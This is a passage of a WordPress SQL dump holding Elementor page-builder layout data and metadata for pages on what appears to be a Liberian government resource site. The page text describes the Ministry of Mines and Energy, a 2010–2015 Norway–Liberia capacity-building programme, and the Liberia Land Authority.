",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:fda\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27269,3957,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:5;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27270,3957,'_thumbnail_id','2717'),(27271,1586,'internet','https://fda.gov.lr/'),(27272,1586,'_pods_institution_logo','a:1:{i:0;i:2180;}'),(27274,1586,'institution_logo','2180'),(27275,3958,'_elementor_edit_mode','builder'),(27276,3958,'_elementor_template_type','wp-post'),(27277,3958,'_elementor_version','2.7.5'),(27278,3958,'_wp_page_template','default'),(27279,3958,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27280,3958,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27281,3958,'_thumbnail_id','2719'),(27282,3959,'_elementor_edit_mode','builder'),(27283,3959,'_elementor_template_type','wp-post'),(27284,3959,'_elementor_version','2.7.5'),(27285,3959,'_wp_page_template','default'),(27286,3959,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27287,3959,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27288,3959,'_thumbnail_id','2719'),(27289,1608,'internet','https://mme.gov.lr/'),(27290,1608,'_pods_institution_logo','a:1:{i:0;i:2604;}'),(27291,1608,'institution_logo','2604'),(27297,1602,'_last_editor_used_jetpack','classic-editor'),(27298,3961,'_elementor_edit_mode','builder'),(27299,3961,'_elementor_template_type','wp-post'),(27300,3961,'_elementor_version','2.7.5'),(27301,3961,'_wp_page_template','default'),(27302,3961,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.<\\/p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\\u00a0<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"272fc6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"c718620\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98dfd4f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured 